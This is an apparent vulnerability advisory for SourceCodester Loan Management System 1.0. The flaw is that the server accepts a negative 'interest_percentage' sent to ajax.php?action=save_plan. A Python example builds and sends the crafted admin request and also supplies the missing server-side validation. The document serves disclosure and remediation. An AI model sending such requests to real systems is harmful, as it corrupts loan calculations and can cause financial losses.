SourceCodester Loan Management System
cpe:2.3:a:loan_management_system_project:loan_management_system:*:*:*:*:*:*:*
- 1.0
A business logic vulnerability has been identified in SourceCodester Loan Management System version 1.0. The application relies on client-side validation only: the Plan Management form prevents a negative value from being typed into the Interest field, but the server-side handler behind it performs no equivalent check. Anyone holding an authenticated administrator session can therefore submit the POST request directly with a negative 'interest_percentage', and the application stores a loan plan with a negative interest rate, breaking the assumptions of its financial logic.
Exploitation of this vulnerability leads to the creation of loan plans with negative interest rates, causing incorrect loan calculations and potential financial losses if such plans are applied to real loans.
To reproduce this vulnerability, log into the application as an administrator and navigate to the Plan Management page. Although the frontend blocks negative input in the Interest field, this can be bypassed by sending a POST request to the 'ajax.php?action=save_plan' endpoint with a negative value for 'interest_percentage'. After the request is processed, the negative interest rate will be reflected in the loan plan, confirming the vulnerability.
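The following is an added example, not code from the advisory or from the Loan Management System project. It builds the save_plan request body directly (so the browser-side restriction on the Interest field never runs) and, beside it, shows the server-side check the endpoint is missing. Only the endpoint 'ajax.php?action=save_plan' and the field 'interest_percentage' come from the advisory; the base URL, the PHPSESSID session cookie, the extra form fields 'months' and 'penalty_rate', and the numeric bounds are assumptions chosen for illustration.

```python
"""Added example: crafted save_plan request plus the missing server-side check.

Assumptions (not stated in the advisory): the form also carries 'months' and
'penalty_rate', the admin session is a PHPSESSID cookie, and the bounds in
BOUNDS are reasonable limits for a loan plan. Only 'ajax.php?action=save_plan'
and 'interest_percentage' are taken from the advisory.
"""
from decimal import Decimal, InvalidOperation
from urllib.parse import urlencode
from urllib.request import Request, urlopen


def build_plan_payload(months, interest_percentage, penalty_rate):
    """Form body exactly as the browser would post it, but built here so the
    HTML-side restriction on the Interest field is never consulted."""
    return {
        "months": str(months),
        "interest_percentage": str(interest_percentage),
        "penalty_rate": str(penalty_rate),
    }


def send_save_plan(base_url, session_id, payload, timeout=10):
    """POST the payload with an existing admin session (assumed cookie name).
    Performs network I/O; not exercised by the offline checks below."""
    req = Request(
        f"{base_url.rstrip('/')}/ajax.php?action=save_plan",
        data=urlencode(payload).encode(),
        headers={
            "Cookie": f"PHPSESSID={session_id}",
            "Content-Type": "application/x-www-form-urlencoded",
        },
        method="POST",
    )
    with urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


# Assumed bounds (inclusive). Interest and penalty are percentages, so a
# negative value or one above 100 is rejected regardless of what the form allowed.
BOUNDS = {
    "months": (Decimal(1), Decimal(600)),
    "interest_percentage": (Decimal(0), Decimal(100)),
    "penalty_rate": (Decimal(0), Decimal(100)),
}


def _parse_number(raw):
    """Parse a form value as a finite decimal; 'NaN', 'Infinity', '' and
    non-numeric strings all come back as None rather than slipping through."""
    try:
        value = Decimal(str(raw).strip())
    except InvalidOperation:
        return None
    return value if value.is_finite() else None


def validate_plan(form):
    """Server-side validation the endpoint lacks. Returns a list of error
    messages; an empty list means the plan may be saved."""
    errors = []
    for field, (low, high) in BOUNDS.items():
        value = _parse_number(form.get(field, ""))
        if value is None:
            errors.append(f"{field} is not a finite number")
        elif not low <= value <= high:
            errors.append(f"{field} must be between {low} and {high}")
    return errors


if __name__ == "__main__":
    crafted = build_plan_payload(12, -5, 2)
    print("crafted body:", urlencode(crafted))
    print("server-side check:", validate_plan(crafted) or "accepted")
```

To reproduce against a lab instance, call `send_save_plan("http://lab.example/lms", "<admin PHPSESSID>", build_plan_payload(12, -5, 2))` and then view the plan list; the negative rate appearing there confirms the missing check. The fix is the `validate_plan` half: re-parse every numeric field on the server and enforce the range there, since anything enforced only by the HTML form is advisory to an attacker.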